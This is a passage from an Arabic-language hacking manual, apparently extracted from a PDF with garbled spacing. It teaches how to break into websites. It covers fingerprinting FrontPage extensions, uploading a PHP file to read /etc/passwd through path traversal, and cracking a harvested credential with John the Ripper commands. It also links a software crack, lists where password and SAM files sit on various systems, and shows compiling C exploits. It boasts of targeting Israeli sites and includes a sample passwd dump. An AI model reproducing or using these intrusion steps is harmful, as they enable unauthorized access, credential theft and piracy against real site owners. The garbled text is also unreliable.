Microsoft Telnet> Open www.Victim.<strong>com</strong> 80<br />
-قمبارسال طلب Requestللخادم و لتكن الطریقة Method هي . Head<br />
<strong>١</strong>٣٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
) ملاحظة : علیكالالمام بكیفیة التعامل معبروتوكول ( HTTP<br />
.<br />
:<br />
Head www.Victim.net HTTP/1.1<br />
Host: ISP.net<br />
*/* :Accept<br />
Connection: close<br />
.<br />
-قمبارسالالتالي حیث http://www.Victim.net هو الموقعالض حیة و ISP.netهو البروكسي<br />
الخا صبمزودالخدمةالخا صبك<br />
-انتظربضعثواني<br />
- ستستلمالاجابة Response عن الطلب الذيارسلتهبللخادم Server مثلتاریخ آخرتعدیل<br />
للصفحة و نو عالملقم والخدمات المتوفرةبه<br />
و من ضمن الخدمات ستجد نفس الذي وجدناهفي الطریقة السابقة و هوأن خدمة ال<br />
FrontPage و<br />
ستظهرلكبالشكل mod_frontpage/X<br />
حیث X یرمز لاصدارة ال . FrontPage Extensions Server<br />
@كیفیةاستغلالهلیصبحفي صال حك<br />
:<br />
.<br />
(<br />
)<br />
اذا عثرت على موقع یدعم هذهالخدمة ولم یتم وضع صلاحیات على مجلدال _vti_pvtقمبالتالي :<br />
ملاحظة : علیكالالمامبلغةتعمل على ناحیة الخادم وفي حالتنافهيال PHP ،كماأن على الموقع<br />
الض حیة دعم هذه اللغة<br />
*قمبالاتصالبالموقعالض حیة<br />
*قم بتحمیل مل ف ینتهيامتدادهب PHP و ضمنه التالي<br />
<br />
وقمناهنابرفع مل ف PHPللخادم یقوم بفتح ملف غیرمعینثم یحضر محتویاته على حسب حجمه<br />
بالبایتثمیعرضهثم یغلقالملف ، والآنكل<br />
<strong>١</strong>٣٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
ما علیكفعلهالآن هوالدخول على الموقع عبرالمتصفح والحاقه ب بعنوان المل فالذي حملته والمتغیر<br />
file و المل فالذيتریدمعاینةالشفرة<br />
المصدریةالخاصةبه ، مثال :<br />
www.Victim.<strong>com</strong>/uploded_file...../../etc/passwd//:http<br />
حیث uploded_file یشیر لاسمالمل فالذيقمت بتحمیله<br />
الملفات والمجلداتالموجودةفيالخادم ....<br />
، وتستطیعاضافةاوامرتسمحلكبمعاینة<br />
<strong>١</strong>٣٦
س
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
،<br />
(:<br />
!!<br />
س٥:أها ،لكني ماأعر فأستخدم هذاالبرنامج ممكنتشرحهوليأخيالعزیزالقنا صلو سمحت ؟؟<br />
ج٥: لاتستأذن مني یاولد ،أنافي الخدمة ، شو ف:انتأول ماتنزل البرنامجوتفك ضغطه ،هیكون<br />
فیه مجلدین , run doc & :الي یهمنا هو مجلد , run شو ف: عشانتسهل على نفسك وبدل ماتفتح<br />
الدوسوتدخل على مجلدالبرنامج وهالمشاكل وكما نالبع ض مابیعر فیعملهالأشیاء: p:<br />
ابحثفي جهازك عن <strong>com</strong>mand.<strong>com</strong> :وقمبنسخه والصقهفي مجلد , runأوكى ؟؟<br />
وجیبكلمةالسر هذه tradesys:FpNTpIDWSk872 :وحطهافي مل ف txtباسم passwd مثلا<br />
وضعهفي مجلد , run ولاتقم بفتح , john.exe افتح <strong>com</strong>mand.<strong>com</strong> واكتبفیهالأوامرالتالیة:<br />
لیب حثلك عنالكلمات السریةالتيتكون مطابقه لاسم المستخدم<br />
لیب حثلك عن الأرقامفقط<br />
لیب حثلك عن الحرو ف الصغیرة<br />
لیب حثلك عن جمیعالاحتمالات ) وأنا على طولأستخدم هذاالأمر<br />
عشانكده بتطول عملیة الفكمعي( D:<br />
وبعدما ینتهيالبرنامج منفك الكلمة ستجدكلمةالسر المشفرة والمفكوكهبالمل ف هذا john.pot:<br />
،<br />
،<br />
john -single passwd.txt >><br />
john -i:Digits passwd.txt >><br />
john -i:Alpha passwd.txt >><br />
john -i:all passwd.txt >><br />
س٦: یااا ه ،البرنامج طولكثیر ، متأكدأنههیفكتشفیرها ؟؟<br />
ج٦:أیوووووه لازم یفكتشفیرهافيالنهایة ، حتىلوأخذأسبو ع؛) ،لأنهبیجرب جمیعالاحتمالا ت.<br />
وممكنتعر ف حالة البرنامجبالضغط علىأي زر منلوحة المفاتیح<br />
(:<br />
،<br />
س٧:الحمد الله خلا صانفك تكلمةالسر , (Y)لكن ویناسم المستخدم ؟؟<br />
ج٧:فيكلمةالسر هذه , tradesys:FpNTpIDWSk872 :هیكوناسم المس<br />
یعنيالكلمةالي بتكونقبل علامة<br />
تخدم ( tradesys :<br />
( :<br />
$:<br />
،<br />
س٨:قناا ا ص ممكنتقوليكی ف جبت هالثغرة منالموقع ؟؟<br />
ج٨:هههههههههه ،،، ولیههالوجه الخجلان؛) ،أنابصراحة جبتهابالبح ثالعشوائي<br />
عنك موقع ممكنتعمل علیه سكان ببرنامجفح ص مثلبرنامج عمران<br />
الثغرات الموجودةبالموقع<br />
، ولكنانتلوكان<br />
(المفضللدي ) D: عشانتطلع<br />
(:<br />
(:<br />
س٩: طیبأنا عندي سؤالین عالجواب اليفات ده ، هأسأل واحدالأول ،ایه طریقة البح ثالعشوائي<br />
هذه ؟؟<br />
ج:أحمأحم : انكتب حث عنثغرةمعینةفي محركب حث یستخدمال spiders عشانتلاقي<br />
مواقعكثیییرةفیهاالثغرة هذه ،في طبعا مواقعكثیرة بتستخدمالسبایدرز ،لكنلن أقولكلك علىأي<br />
واحدة منها ،الا هذا الموقع walla.co.il :وطبعا هذا موقعاسرائیلي ، عشانمعظم النتائجتكون مواقع<br />
، هذهالطریقة<br />
اسرائیلیة؛) .<br />
<strong>١</strong>٣٨
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
!!<br />
،<br />
س<strong>١</strong>٠: ممممم ،كی فیعنيتب حث عنثغرة معینه ؟؟ ، مافهمتك زین<br />
ج<strong>١</strong>٠:أنا واالله ماأستخدم هالمواقعالاللب حث عنثغرات الفرون تبیج :$ ، یعنيانت مثلا عایزتب حث عن<br />
الثغرة التيتم ذكرها سابقا ایه ؟؟ مانتكاتب غیركلمة واحدة<br />
، هذه :) :) service.pwd :<br />
، هتكتب<br />
:)<br />
(:<br />
،<br />
س<strong>١</strong><strong>١</strong>:أهاااا مشكور حبیبي ،كنت عایزأسألككمان عنكیفیة عملبرامجالسكان على الثغرات<br />
ج<strong>١</strong><strong>١</strong>:البرامج هذه بتكونفیها مجموعةكبیرة منالثغراتأو ال , EXPLOITES وبتبدأتجربثغرة<br />
، وفي موقع رهیییب عشانتجیب منه ال , EXPLOITES هذا<br />
ثغرة على الموقع<br />
هو:<br />
، وتطلعلكالنتائج (:<br />
... http://www.ussrback.<strong>com</strong>/<br />
" شرح برنامج Shadow Scan Security لتحلیل الموقع "<br />
<strong>١</strong>٣٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$$<br />
<br />
$$$$$$$$$$$$$$$<br />
الكاتب: لا<br />
د ر<br />
نبذةبسیطة عن البرنامج :<br />
هذا البرنامجهو أكثر البرامجفعالیة في اكتشا ف الثغرات وأیضا المنافذ المفتوحة ف المواقع ولدیهأعمال<br />
كثیرةلكنيلن أتطرق إلالعملیة واحدةفق ط وهيشر حكیفیة اكتشا ف الثغراتفي المواقعومعرفة النطاقات<br />
المستخدمةلهذا الموقع وبالنسبةللخیارات الباقیةلنأشرحهالأنها سو فتأخذ وقت طویللكني سو ف<br />
أقسم شرحيلهذا البرنامج لأقسام عدة وسو فأبدئهابالأعظم وهوشرحلكیفیةإخراجثغرات الموقع<br />
والمنافذ الخاصةبه والمواقع المسجلبها والمزید من الوظائ ف<br />
أولا:تنزیل البرنامج وتنصیب الكراكSecurity Shadow Scan<br />
منه مافیهأبسط<br />
حمل البرنامج<br />
من هذي الوصلة<br />
http://www.safety-lab.<strong>com</strong>/SSS.exe<br />
وبعد<br />
مایكتمل التحمیل<br />
حمل الكراك<br />
منهنا<br />
http://www.e3sar.net/almodammer/ShadowSecurityScanner5.35.exe<br />
الطریقة :<br />
========================================<br />
بعدتحمیل البرنامج وتنزیله وعمل SetUpله<br />
افتح الكراك<br />
وبعد ذلك ستظهر هذه الصورة :<br />
<strong>١</strong>٤٠
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
+++++++++++<br />
ٍ][<strong>١</strong> ][اضغطلیتمتنفیذ الكراك<br />
][٢ ][ بعدإتمام عملیة الكراكاضغطهناللخروج<br />
========================================<br />
&***** ش البرنامج ر ح*****&<br />
)=<br />
سو فأشرحباختصار ومنیصعب علیه الفهمأرجوأنیتقدمليبالسؤال<br />
بعدتحمیل البرنامجقم بفتحه منقائمة<br />
ابدأStart<br />
واب حث عنه ضمن البرامج<br />
بعدإیجاد البرنامجقم بفتح<br />
ShadowScanSecurity<br />
لیأتيلك هذا ( =<br />
الشكل - <strong>١</strong> -<br />
أثناء الضغ ط علىScanner<br />
الشكل ٢- -<br />
<strong>١</strong>٤<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
= ٣<br />
<strong>١</strong>=إ ضافة سیاسة جدیدة والمقصودبهاأیقونةأخر ى وهي الرقم ٤ ولكنتحملاسمك (ولاداعيلأنتنشأ<br />
باحثأو سیاسة جدیدةلك یكفیك الموجودة (<br />
٢ =إعداداتلهذا الباح ث وأیضا انا لاأنص حك بتغییر شيءأبدافي هذا الخیار<br />
حذ ف الموجه الجدید التي انت صممته والمقصود الأیقونة التيتشبهرقم ٤ ولكن منتصمیمك<br />
فبضغطكهنا سو فتحذفها<br />
٤= علیكتظلیله وهو المربع الذي یوجدبه خصائ ص الب حث عنكل شيء<br />
٥=لرجو عللخلف ولاأظنأنهناك رجو علأنها العملیة والإ طار الاول<br />
اضغطهاإ ذاأردت المتابعة<br />
الإ طار<br />
=٦<br />
٧ =إزالة<br />
الشكل - ٣ -<br />
) (<strong>١</strong> للرجو عإلى الشكل ٢- -<br />
(٢) الذهابإلى العملیة التالیة<br />
) ٣ )إلغاءإكمال العملیة<br />
الشكل - ٤ -<br />
<strong>١</strong>٤٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
+<strong>١</strong> +إ ضافة موقعللبحثفیه<br />
+٢ +إ ضافةأيبي من وإلى<br />
من ملف سواءكانیحتوي على مواقعترید البحث عنها اوآيبیات<br />
موقع وبعدتحدیده أثناء الضغ طهنا سو فینحذ ف<br />
+٥ + العودة والرجو عإلى الخل فأي :الشكل -٣ -<br />
+٦ +إتمام العملیة<br />
+٧ +إزالة والخروج من الإ طارإلى واجه البرنامج الرئیسیةكباقي الأزرار السابقةفي الأشكال السابقة<br />
+٣ +تحمیل<br />
+٤ + عندإ ضافة<br />
الشكل ٥- -<br />
أثناء ضغ ط الزر Done وفي الخطوة السابقة سو فیظهر هذا المربع الكبیر<br />
ومنهنا سو ف نبدأ البح ث عن الثغرا تأنظر الشكل لتفصیل أكثر<br />
<strong>١</strong>٤٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
الشكل ٦- -<br />
بعد الضغ ط على Start Scan وذلك بتظلیل الموقع والضغظ بزر الفأرة الیمین<br />
انتظرقلیلا بعد ضغطكلرقم<strong>١</strong>في الشكل -٥ -<br />
وسو ف یقوم البرنامجبالبح ثفي الموقع والمنافذ الخاصةبه<br />
مع النطاقاتكماهو<br />
موضحفي هذا الشكل<br />
...<br />
<strong>١</strong>٤٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
اماكن وجود ملف الباسورد في أنظمة التشغیل<br />
"<br />
$$$$$$$$$$$<br />
الكاتب:بلاكهنتر<br />
$$$$$$$$$$$<br />
في نطملیونكس<br />
/etc/shadow<br />
في نظم صن میكروسیستیمز<br />
/etc/shadow<br />
في نظمال BSDبصفه عامه<br />
/etc/master.passwd<br />
في نظمالسیلیكون جرافیكس SGI المسمى ARIX<br />
/etc/shadow<br />
نظامايبيام المسمى AIX<br />
/etc/security/shadow<br />
))<br />
(( (( ((<br />
/etc/shadow<br />
((<br />
))<br />
نظم ویندوزبصفه عامه )) XP - NT - 2000 ((<br />
((<br />
/winnt/system32/config/sam<br />
نظم یونك سبصفه عامه<br />
وبع ض منتجاتالالفا<br />
ات شبي یو اكس - ((ترو یونك س 64<br />
اغلب هذهالاصداراتتعتمدتشفیر MD5 القوي<br />
المل ف المفعل بتشفیر (( LanMan<br />
))<br />
خا صبالمنفریم ونظمالریسك<br />
٦٤<br />
((هذاالمل ف مغلق عادةالا عندالاقلا ع من النظام ولا یسمح بفتحهاو نسخه طالماالنظامیعمل حتى ولو<br />
كانلدیك صلاحیات الادمنیستریتور<br />
المل فالاحتیاطي<br />
))<br />
((<br />
((<br />
))<br />
/winnt/repair/sam or sam._<br />
في الویندوز اكسبيالبروفیشینال واصدارات الویسلر<br />
لنتجدالویندوزفي مجلد WINNT<br />
ولكن سیكونكالویندوزالعاديWindows .<br />
سیرفر -ادفانسد سیرفر<br />
((<br />
<strong>١</strong>٤٥
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
اختراق الموقع (الجزء الأول) "<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$$$<br />
الكاتب:الكندور<br />
$$$$$$$$$$<br />
مقدمه :<br />
سأعیدتعری ف Telnet من جدید ولكنبطریقهاكثربساطه<br />
Telnetهوبرنامج یستخدمفيإنشاء وصلهبین جهازین ،والجهازالمتصل یستخدم عنوان الجهاز<br />
المستهدف و رقم المنفذ Port الذي سیتمالاتصال علیه ،والجهازالمستهد ف الخادم )یشغلبرنامج آخر<br />
(Daemon)یستمع على هذا المنفذ و تتم عملیهالإرسال والاستقبالباستخدامأحدالبروتوكولات<br />
تشبیه من حیاتناالعملیة نفتر ضأن هناك رجلفيفرنسا المستهد ف) وأنت المتصل)تریدإقامة حوار<br />
معه (وصله) وأنتفي مصر ..فلابدلك مناستخدام وسیله اتصال (Telnet) ولنفر ضأنها الهات ف<br />
الذي لابدللرجلأن یضعه علىأذنه (Daemon)لكي یسمعك .. ولنفر ضأیضاأن هذا الرجل لایتحد ث<br />
العربیة ..إذنفلابدلك مناستخدامالفرنسیة البروتوكول المستخدم) حتى تتحد ث( الإرسال والاستقبال)<br />
بحریه<br />
مما سبق نستنتجأن Telnetهو مجرد وصله ) مثلالهات ف ( .. وانه لابدلنا منمعرفة البروتوكول<br />
المستخدمفيالاتصال حتى ننجحفيالإرسال و الاستقبال .كماانه لابدلنا منأننعر فأیضاأنه لابد من<br />
برنامج Daemonیتسمع على المنفذالمرادالاتصال علیه .<br />
.<br />
)<br />
)<br />
..<br />
)<br />
)<br />
:<br />
استخدام Telnet ك FTP Client<br />
.<br />
المنفذالذي سیتمالاتصال علیهفي حالهاستخدامنابروتوكول نقلالملفات FileTransfer Protocol<br />
في الغالب سیكون .. ٢<strong>١</strong><br />
أینالصعوبةإذن ؟<br />
الصعوبةتكمنفيأننالكي نستخدم Telnetك FTPیجب Client علیناالإلمام بقدركبیر ببروتوكول<br />
..<br />
.<br />
FTP !!<br />
ولكن هذالن یمنعني من عر ض بع ض الأمثلة لإظهاركیفیة التعامل مع هذا البروتوكول<br />
بدءالاتصال<br />
<strong>١</strong>-قم بتشغیل Telnet و شبك على ftp.zdnet.<strong>com</strong>بالمنفذ ٢<strong>١</strong><br />
و هذا ما سیظهرلك<br />
- Code Sourcesشفرة<br />
220 l19-sj-zdnet.zdnet.<strong>com</strong> NcFTPd Server (licensed copy) ready.<br />
و السطر السابق یسمي Banner الخا صبال FTP Daemon المستخدمفي موقع zdnet وهي<br />
تختل فباختلا فالموقعالذي سیتمالتشبیك علیه . و الرقم الموجودفيالبدایة یدل على نجاح الاتصال و<br />
هو رقمثابت<br />
٢-الخطوةالتالیةهيالولوجباستخداماسمالمستخدم Username وكلمة السر .. Passwordبما<br />
أن zdnetتدعم المستخدم Anonymous سیتم استخدامهفيالولوجللنظامكالتالي:<br />
ستكتب<br />
- Code Sourcesشفرة<br />
user anonymous<br />
و سیستجیبالخادمبالتالي<br />
- Code Sourcesشفرة<br />
<strong>١</strong>٤٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
331 Guest login ok, send your <strong>com</strong>plete e-mail address as password.<br />
ثمتكتبأنتالتالي<br />
- Code Sourcesشفرة<br />
pass @zorro<br />
وبالطبع عندالولوجبالمستخدم Anonymousتقومبإعطاء عنوانالبریدالإلكترونيالخا صبكككلمة<br />
السر .. وإ ذالمتردإعطاءبریدكفیمكنكأنتكتبأي شئ یأخذ شكلالبرید أي یحتوي على الرمز @ (<br />
و سیستجیبالخادمبالتالي<br />
)<br />
- Code Sourcesشفرة<br />
230-You are user #552 of 2000 simultaneous users allowed.<br />
230-<br />
230 Logged in anonymously.<br />
..<br />
.<br />
.<br />
.<br />
وبالطبعتلك ا لإ ستجابهقدتختل ف من موقع لآخر ..إلافي الرقمفيبدایةكل سطر<br />
أنتالآنقدقمتبالولوجإلىالخادمبنجاح<br />
بعدأنتمت عملیهالولوجللنظام یجبإنشاء وصله لإرسال واستقبالالبیانا ت)قائمهبالملفاتالموجودةأو<br />
الملفات ذاتها) ..إذن ماالذيكنا نفعله منذقلیل ؟!! ماقد فعلناه منذقلیل هوإنشاء وصله لإرسال الأوامر<br />
للنظام واستقبالاستجابة النظام علىالأوامر .<br />
ولكي ننشئتلكالوصلة ،هناك طریقتین<br />
الأولي :تنشئ هذه الطریقةالوصلةبان یرسلالزبون (أن ت) رقم IP الخا صبه و المنفذالمفتوح الذي<br />
یستطیع الخادماستخدامهفيإرسالالبیانات<br />
ولكنتلكالطریقة تتطلب منك فتحأحدالمنافذ على جهازك و هذا سیتطلببرنامج خا صلفتح هذاالمنفذ<br />
نستخدمتلك الطریقة<br />
الثانیة :تنشئ هذه الطریقة الوصلةبان یرسلالزبونالأمر PASV<br />
.. ولذلكلن<br />
- Code Sourcesشفرة<br />
PASV<br />
و سیردالخادمبرقم IP الخا صبه والمنفذالمفتوح<br />
الاتصال علیه<br />
..<br />
مثال<br />
- Code Sourcesشفرة<br />
227 Entering Passive Mode (207,189,69,61,12,41)<br />
..<br />
(علىالخادمبالطبع)الذي یستطیع ال زبون (أن ت)<br />
و الرقم الطویلالموجودبین الأقواستفسیرهكالتالي<br />
أولأربع مجموعات (منالیسار)هوال IP الخا صبالخادم وفي هذهالحالة یكون .. ٢٠٧،<strong>١</strong>٨٩،٦٩،٦<strong>١</strong><br />
أما الرقمانالتالیانفیمثلان رقم المنفذ ویتم حسابهكالتالي<br />
12 × 256 + 41 = 3113<br />
ولذلكفالخطوةالتالیةالتي یجب علىالزبون اتباعها هي فتح وصله جدیده معالخادم علىالمنفذ ٣<strong>١</strong><strong>١</strong>٣<br />
..ولكيتقومبمثل هذاالأمریتوجب علیك فتح نافذة Telnet جدیده وتشبك على ftp.zdnet.<strong>com</strong><br />
بالمنفذ .. ٣<strong>١</strong><strong>١</strong>٣<br />
إذن عندماتریدأنترسلأحد الأوامر سترسله من النافذةالأولى و النافذةالثانیة ستظهربهاالبیانات<br />
مثال<br />
عندماترسل الأمر( LISTیستخدم لعر ض محتویاتالدلیل)فيالنافذةالأولى<br />
- Code Sourcesشفرة<br />
..<br />
<strong>١</strong>٤٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
LIST<br />
سیستجیبالخادمبالتاليفيالنافذةالأولىأیضا<br />
- Code Sourcesشفرة<br />
125 Data connection already open; Transfer starting.<br />
و ستظهر محتویاتالدلیلفيالنافذةالثانیةثم<br />
محتویاتالدلیل<br />
سیتم غلقالاتصالفي النافذةالثانیةبمجردإتمام عر ض<br />
.<br />
و هكذاكلماأرد تأنترسلأمر عر ض محتویات دلیل ماأواستقبالأوإرسال مل ف ما ، یجبأنتبدأ بأمر<br />
.. PASVثمتنشئ اتصالا جدیدا بعد حساب رقم المنفذباتبا عالخطوات السابقة .<br />
إلى هنا وأظنأننيقدتمادیت .. ولكننيلماستطعأنامنع نفسي<br />
من مشاركتكمبهذاالموضو عالممتع<br />
(ممتعبالنسبةإلي) .<br />
ملاحظات هامة<br />
-لربما تتساءلالآن ..ألاأستطیعبدلا منكل هذا الهراءأناستخدمبرنامج جاهز مثل CuteFTP؟!!<br />
بالطبعتستطیع ولكنلن یضركأنتعلم شیئا عنالبروتوكول الذيتستخدمه و ربما بعدتعلمالبروتوكول<br />
تستطیعأنتصنعبرنامجك الخا ص<br />
-اقرأالدرس مره و مرتین حتىتستوعبا لفكرةتماماثماسألفیما شئ ت<br />
- لتعلماكثر عن هذاالموضو عقم بزیارة المواقعالتالیة<br />
http://www.<strong>vb</strong>ip.<strong>com</strong>/winsock/winsock_ftp_01.asp<br />
(ینصحبهبشده)<br />
(ینصحبهبشده)<br />
لمناراد التعمقفي<br />
البروتوكول)....<br />
http://www.<strong>vb</strong>ip.<strong>com</strong>/winsock/winsock_ftp_ref_01.htm<br />
) http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html<br />
<strong>١</strong>٤٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$$$<br />
الكاتب:الكندور<br />
$$$$$$$$$$<br />
-<br />
اختراق المواقع<br />
.....<br />
(الجزء الثاني) "<br />
ا لإختراق:<br />
~~~~~~~~~<br />
-المقدمة .<br />
-كی فأجمعمعلومات حول الموقع ؟<br />
-كی فیتمكش ف نقاط الضع ف ؟<br />
-كیف یمكن إ ستغلال نقاط الضع فالمكتشفه ؟<br />
-ماهو مل فكلمة المرور password؟ file<br />
بماذا یفیدني هذاالمل ف ؟<br />
-كیف یمكنمعرفةكلمة السر من خلال مل ف الباسورد password؟ file<br />
-ماالفر قبینإ ذاكان المل ف (مشفر encryption) وإ ذاكان (مضلل (shadowed؟<br />
-وماذالوكان مل فكلمة المرور مشفر ،كی فیتمكسره ؟<br />
-ولوكان مل فكلمة المرور مضلل ، ماذا عليانأعمل ؟<br />
<br />
كیفیة جمعالمعلوماتقدتقدم الكلام عنها<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
-<br />
كی فیتمكش ف نقاطالضع ف ؟<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
لاتستخدمبرامج مثل voidأو eye ShadowSecurityScaner هذهللمغفلینفقط!! ،المحترفین<br />
واللي یبغا یكون محتر ف لایستخدمبرامجفي عملیات ا لإختراق ، ولا یخترقلمجردأنه یبغا یخترق ،<br />
عملیه إختراق سیرفرتمتازبالدقهالمتناهیه ، والتخطی طالمحكم ، وكل عملیات السطوالمحكمه هي التي<br />
یصعب إكتشا ف مرتكبیها ،لكن وااللهلوكنت مناللي یشغلبرنامج ومایدرياالله وین حاطهفصدقنيإنك<br />
ماراحتفلح طول عمرك ، هذالوقدرتتخترق شئ ،فلو حد ثوتما لإختراقبواحد من هذهالبرامجفسو ف<br />
تصطادبسنارهتماماكالسمكه<br />
الآن سو فأضع النقاطالأساسیهلكش ف نقاطضع ف على موقع ما<br />
- :<br />
.....<br />
-٢<br />
<strong>١</strong>-التعر ف علىكافه الخدماتالموجوده علىالسیرفر.<br />
معرفه نظامالتشغیل وإ صدارته وكذلك ملقم الویب وأيبرمجیاتأخر ى مثل مفسر نصو صبیرلإ ذا<br />
كان ذلك ممكن ،أوبرنامجللبیع والشراء الخ.<br />
٣- عمل جلسه لإلتقاطكل السكربتات ) Cgi ( Perl - الموجودهفي الموقع ، هذاإ ذا وجد شئ منها<br />
- ٤ ولاتنسىتح ط البورتاتمعها ،لأنهأحیانا یكونفيالبورت نقطهضع ف ،لیس هذا ص حیحا<br />
نقطهالضع فلیستفيالبورت بعینه ،فيالبرنامج اللي مصلحإنصا تللبورت (هذا أقربتعبیرلها)<br />
٥-أخیرا یمكنك ا لإ ستفاده م نالمعلوماتالتي حصلت علیهافيالب حث عن نقاط ضع ف (یوجدفي آخر هذا<br />
المستند مواقع من ظمنها مواقعتحتوي علىأرشیفاتقدتفیدكفي ال حصول على الثغرات (<br />
%<strong>١</strong>٠٠<br />
<strong>١</strong>٤٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
-كیف یمكن إ ستغلال نقاط الضع فالمكتشفه ؟<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
أبس طالثغرات والتي یستطیعأي مبتديأن یستخدمهاهيتلكالتيتنفذ من خلال المتصفح ،<br />
نوع آخر ، یكون ا لإ ستثمار (منالآن سو ف نطلقإسم إ ستثمار على الطریقه التيتستغلبها الثغره) یكون<br />
ا لإ ستثمار على شكل شفره(كود) مكتوب ببرنامج shفيلیونكس ، وهو ما یسمىبالعربيبرنامجالغلا ف<br />
وبالإنجلیزي shell وتكون هذهالشفرهتحت مل فبا لإمتداد *.sh وتعملتح تبیئهلیونكس ، وهذاالنو ع<br />
من ا لإ ستثمارات هو المفضل وی حسس المخترقبالقوه ونظرا لتعدد الأداوتفيلیونكسفإنلغه shell<br />
اصبحتقویهفهيتقابل كتابه مل ف دفعاتيفي ویندوز (bat)<br />
ویوجد نو ع منا لإ ستثماراتثاني وهو شفره (كود) مكتوببلغه C المشهوره ، وهذاالنو ع غالبا ماتحد ث<br />
فیهأخطأ أثناء عملیه الترجمه ،قدتواجهكثیر من المتاعبلذلك یجبأنتكونلدیك خلفیهفيلغه سي ،<br />
ولترجمه هذاالنو ع علیكبالذهاب الىلیونكسوترجمته بإ ستخدام المترجم gccبهذهالصیغة<br />
..<br />
gcc Exploit.c -o Exploit<br />
ملاحظه مهمه (یجبأن یكون ا لإمتدادللمل ف c.* ولیس ، C.*لوكان حر ف cكبتلفسوفیترجم<br />
ا لإ ستثمار وكأنه كتبفي سي ++ ، الشئ الثانيتأكد منتوفرالمكتبات (h.*) التيیتطلبها ا لإ ستثمارقبل<br />
تشغیله) و علیك زیاره موقعيفهناك مستنداتفيالبرمجهقدتنفعك .<br />
یوجد نوع ظهر مؤخرا من ا لإ ستثمارات وبداء ینتشر وهوأیضا شفره ولكن مكتوبهبلغه Perl ومن<br />
الممكنأنیتمتشغیل هذا النو ع من موجه الدوسفي ویندوز (یجبأنتملكبرنامج یفسر شفرات البیرل<br />
مثلأكتی فبیرل (<br />
-ماهو مل فكلمة المرور password؟ file<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
مل فكلمة المرورمعرو ف منإسمه ،هوالذيفي داخلهتوجد حسابات الأشخا ص المرخ صلهمبالدخول<br />
الىالسیرفر ، مثل هذا<br />
------------------------------------------------------------------------------------------------<br />
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:<br />
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer<br />
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp<br />
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp<br />
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network<br />
Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:<br />
noaccess:x:60002:60002:No Access User:/:<br />
nobody4:x:65534:65534:SunOS 4.x Nobody:/:<br />
www:x:102:1001::/web:/bin/csh<br />
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu<br />
sid:x:103:10::/export/home/sid:/bin/ksh<br />
mirror:x:104:1::/home/mirror:/bin/sh<br />
admin:x:105:1::/home/admin:/bin/sh<br />
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh<br />
landmark:x:1000:1000::/web/landmark:/bin/ksh<br />
<strong>١</strong>٥٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
